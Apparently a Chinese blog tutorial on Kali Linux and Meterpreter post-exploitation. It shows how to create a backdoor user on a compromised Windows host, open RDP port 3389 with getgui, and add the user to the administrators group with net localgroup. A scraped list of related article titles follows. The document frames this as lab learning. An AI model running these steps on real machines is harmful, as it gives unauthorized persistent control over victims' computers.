课前声明:

1、本分享仅做学习交流,请自觉遵守法律法规!

2、搜索:Kali与编程,学习更多网络攻防干货!

一、背景介绍

在我们日常使用Kali Linux时,我们通常在进行模拟攻防演练的时候,我们如何拿下目标主机最高权限呢(例如利用病毒拿下Win7主机),怎样在受害者主机进行随意操作呢?如何进行文件下载以及文件上传呢?如何解决上述问题呢?接下来让我们一起学习!

二、资源装备1.安装好Kali Linux的虚拟机一台;2.已经被控制的Windows主机一个;3.整装待发的小白一个。三、战略安排3.1 查看kali虚拟机sessions状况,如下图所示。命令:sessions3.2 在受害者主机执行病毒文件,如下图所示。步骤:双击如下图所示的文件3.3 再次在Kali Linux中执行sessions命令,如下图所示。命令:sessions3.4 执行命令,给受害者主机创建用户,如下图所示。命令:sessions -i 5run getgui -u 用户名 -p 密码Eg:run getgui -u hacker -p 1234563.5 执行getgui脚本文件,开启受害者主机3389端口(远程桌面连接端口),如下图所示。命令:run getgui -e3.5.1 执行结果如下图所示。3.6 查看受害者主机的ip地址,如下图所示。命令:ipconfig3.7 连接受害者主机的远程桌面,如下图所示。命令:rdesktop 192.168.0.107:33893.7.1 登录窗口如下图所示,根据创建的用户进行登录。3.8 遇到创建的用户不是管理员组用户的问题,如下图所示。3.9 解决升级管理员权限的问题。3.9.1 启动dos窗口命令:shell3.9.2 升级管理员用户,如下图所示。命令:localgroup administrators 用户名 /addEg  :localgroup administrators  hacker /add3.9.3 解决乱码问题,如下图所示。命令:chcp 650013.10 继续登录,如下图所示。3.10.1 登录界面3.10.2 选择是3.11 渗透成功,如下图所示。

辛苦原创,各位看官记得好评加关注哦!你也可搜索:Kali与编程,学习更多Kali Linux渗透与白帽编程技巧哦!

攻防世界 适合做桌面_网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战...相关推荐

  1. 攻防世界 适合做桌面_空间“狭小”的二人世界,适合情侣们做浪漫的事情

    在最浪漫的11月与它邂逅,有着深秋的枫红.累累的苹果红.还有童话绘本中的苹果屋红,充满着热情活力的色彩,让人感到雀跃.眼瞧见银河的感动. 那晚入住于福寿山农场的露营区,位在深山中的它空气轻透又鲜少光害 ...

  2. 攻防世界 适合做桌面_FIFA足球世界球员特性解析:精神篇

    亲爱的小伙伴们,相信大家经过前两篇的解析对球员特性在攻防方面的作用有了一定的认知,那么今天就为大家带来球员特性解析的最后一篇,这篇里的球员特性主要是对于球员在场上的精神力方面发挥着一定的作用,那就是& ...

  3. 攻防世界适合作为桌面

    适合作为桌面 题目描述:无 题目环境:https://download.csdn.net/download/m0_59188912/86741282 使用stegsolve打开图片,stegslove ...

  4. 反arp攻击软件_网络安全工程师教Kali Linux:ARP欺骗概述

    课前声明: 本分享仅做学习交流,请自觉遵守法律法规! 搜索:Kali与编程,学习更多网络攻防干货! 本节课中你将了解到: ARP欺骗的用处 什么是ARP 演示如何通信 ARP欺骗原理 一.ARP欺骗的 ...

  5. 渗透测试工程师前景_网络安全工程师教你:Kali Linux之Metasploit渗透测试基础(一)...

    课前声明: 1.本分享仅做学习交流,请自觉遵守法律法规! 2.搜索:Kali与编程,学习更多网络攻防干货! 3.下篇文章将在明天早上九点发布,敬请关注! 一.背景介绍 Metasploit就是一个漏洞 ...

  6. 局域网arp攻击_网络安全工程师教Kali Linux:ARP欺骗概述

    课前声明: 本分享仅做学习交流,请自觉遵守法律法规! 搜索:Kali与编程,学习更多网络攻防干货! 本节课中你将了解到: ARP欺骗的用处 什么是ARP 演示如何通信 ARP欺骗原理 一.ARP欺骗的 ...

  7. 攻防世界 适合作为桌面

    附件压缩包解压为一张图片 首先看看存在图片可不以可以拆 然后看看是不是图片隐写 用stegsolve查看有设么线索吗? 翻看不同通道发现一个二维码 微信扫码,得到下面的十六进制字符 尝试放入文件保存为 ...

  8. linux做桌面操作系统,我心目中的microsoft(对于普通用户,linux真的适合做桌面操作系统吗)...

    我心目中的microsoft(对于普通用户,linux真的适合做桌面操作系统吗) 发布时间:2008-08-23 15:31:11来源:红联作者:sonr 近年在计算机领域,尤其在linux等开源领域 ...

  9. 小白也能看懂:最全无线渗透测试与攻防+Fluxison钓鱼教程+路由器安全设置指南 2021.3.31

    小白也能看懂:最全无线渗透测试与攻防+Fluxison钓鱼教程+路由器安全设置指南 2021.3.31 一. 无线AP的加密方式 WEP加密 WPA-PSK/WPA2-PSK加密 WPS加密 二. 无 ...

最新文章

  1. 抽点时间让我们一起来学linux系统
  2. 如果输送知识不再重要,那么教育问题出在哪里?
  3. WEB测试 test case测试点
  4. 基于OpenCV的findContours查找图像连通域,并进行排序
  5. python列表生成多个号码_python按需生成固定数量电话号码并保存为excel(不重复)...
  6. 选择器Selector
  7. 目前我国负债超过100万的大概有多少人?
  8. phalanger php compiler,phalanger-php的.net编译器 _php技巧
  9. linux ACL应用学习
  10. App.config 中读写appSettings、system.serviceModel终结点,以及自定义配置节
  11. 水滴石穿之子页面的滚动条设置 表格的固定高度宽度问题 复制带格式的文本...
  12. [C#] DBNull、Null和String.Empty的区别
  13. node http创建正向代理_Node.JS实战20:用execFile执行外部程序
  14. 微信小程序学习笔记-(11)-仿糗事百科
  15. LinkedList的源码分析(基于jdk1.8)
  16. 计算机竞赛奖学金申请书,最新奖学金申请书(精选6篇)
  17. IDEA创建类注释模板和方法注释模板
  18. HTML5期末考核大作业,网站——旅游景点。 学生旅行 游玩 主题住宿网页
  19. Jenkins整合slaver完整搭建
  20. mysqlin查询的java写法_[转载]常用的shell脚本

热门文章

  1. Linux shell创建空文件(0字节大小)文件方法
  2. 问题分享:最近测试VDI-in-a-Box使用AD做身份验证出现以下错误提示:
  3. 面试中的老大难-mysql事务和锁,一次性讲清楚!
  4. MongoDB 新功能介绍-Change Streams
  5. SpringCloud Hystrix介绍以及基于RestTemplate与Feign的改造
  6. CopyOnWriteArrayList原理及算法题存档
  7. java的网络功能与编程_Java的网络功能与编程(转载)
  8. windows下安装consul
  9. ssl问题解决的过程
  10. digest 用户认证 response生成算法